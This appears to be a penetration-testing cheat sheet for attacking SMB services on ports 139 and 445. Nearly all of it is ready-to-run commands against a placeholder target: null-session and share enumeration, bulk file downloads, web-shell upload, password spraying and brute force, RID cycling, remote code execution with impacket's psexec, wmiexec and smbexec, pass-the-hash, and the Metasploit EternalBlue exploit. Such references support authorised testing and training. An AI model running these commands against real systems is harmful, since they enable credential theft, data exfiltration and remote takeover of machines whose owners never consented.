> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# 139 / 445 - SMB

> SMB enumeration and exploitation: null sessions, share listing, credential spraying, and relay attacks.

## Service Detection

```bash theme={"dark"}
nmap -sV -sC -p 139,445 TARGET
```

***

## Enumerate Shares

### smbclient

```bash theme={"dark"}
smbclient -L //TARGET -N
smbclient -L //TARGET -U user%password
```

### CrackMapExec

```bash theme={"dark"}
crackmapexec smb TARGET -u '' -p '' --shares
crackmapexec smb TARGET -u user -p password --shares
```

### smbmap

```bash theme={"dark"}
smbmap -H TARGET
smbmap -H TARGET -u user -p password
smbmap -H TARGET -u user -p password -R    # Recursive
```

### enum4linux-ng

```bash theme={"dark"}
enum4linux-ng TARGET -A
```

***

## Null Session

```bash theme={"dark"}
smbclient //TARGET/share -N
rpcclient -U "" -N TARGET
```

### rpcclient Enumeration

```bash theme={"dark"}
rpcclient -U "" -N TARGET
> enumdomusers
> enumdomgroups
> queryuser 0x1f4
> querydispinfo
> lookupnames administrator
> getdompwinfo
```

***

## Access Share

```bash theme={"dark"}
smbclient //TARGET/sharename -U user%password
```

### Download File

```bash theme={"dark"}
smb: \> get secret.txt
smb: \> mget *.txt
```

### Download Everything

```bash theme={"dark"}
smbclient //TARGET/share -U user%password -c "recurse; prompt off; mget *"
```

### Upload File

```bash theme={"dark"}
smb: \> put shell.aspx
```

***

## Brute-Force / Password Spray

```bash theme={"dark"}
crackmapexec smb TARGET -u users.txt -p passwords.txt
crackmapexec smb TARGET -u users.txt -p 'Summer2024!' --continue-on-success
```

```bash theme={"dark"}
hydra -L users.txt -P passwords.txt smb://TARGET
```

***

## User Enumeration

### RID Cycling

```bash theme={"dark"}
crackmapexec smb TARGET -u '' -p '' --rid-brute
```

```bash theme={"dark"}
enum4linux-ng TARGET -R
```

```bash theme={"dark"}
impacket-lookupsid domain.local/user:password@TARGET
```

***

## Command Execution

### PsExec

```bash theme={"dark"}
impacket-psexec domain.local/user:password@TARGET
impacket-psexec -hashes :NTLM_HASH administrator@TARGET
```

### WMIExec

```bash theme={"dark"}
impacket-wmiexec domain.local/user:password@TARGET
```

### SMBExec

```bash theme={"dark"}
impacket-smbexec domain.local/user:password@TARGET
```

### Pass-the-Hash

```bash theme={"dark"}
crackmapexec smb TARGET -u Administrator -H NTLM_HASH
impacket-psexec -hashes :NTLM_HASH Administrator@TARGET
```

***

## Known Vulnerabilities

### EternalBlue (MS17-010)

```bash theme={"dark"}
nmap -p 445 --script smb-vuln-ms17-010 TARGET
```

```bash theme={"dark"}
# Metasploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS TARGET
run
```

### SambaCry (CVE-2017-7494)

Linux Samba RCE via writable share:

```bash theme={"dark"}
nmap -p 445 --script smb-vuln-cve-2017-7494 TARGET
```

***

## NSE Scripts

```bash theme={"dark"}
nmap -p 445 --script smb-enum-shares TARGET
nmap -p 445 --script smb-enum-users TARGET
nmap -p 445 --script smb-os-discovery TARGET
nmap -p 445 --script smb-vuln* TARGET
nmap -p 445 --script smb-protocols TARGET
```

***

## Quick Reference

| Check          | Command                                           |
| -------------- | ------------------------------------------------- |
| List shares    | `smbclient -L //TARGET -N`                        |
| Null session   | `rpcclient -U "" -N TARGET`                       |
| RID brute      | `crackmapexec smb TARGET -u '' -p '' --rid-brute` |
| Recursive list | `smbmap -H TARGET -R`                             |
| PsExec         | `impacket-psexec user:pass@TARGET`                |
| EternalBlue    | `nmap --script smb-vuln-ms17-010 TARGET`          |
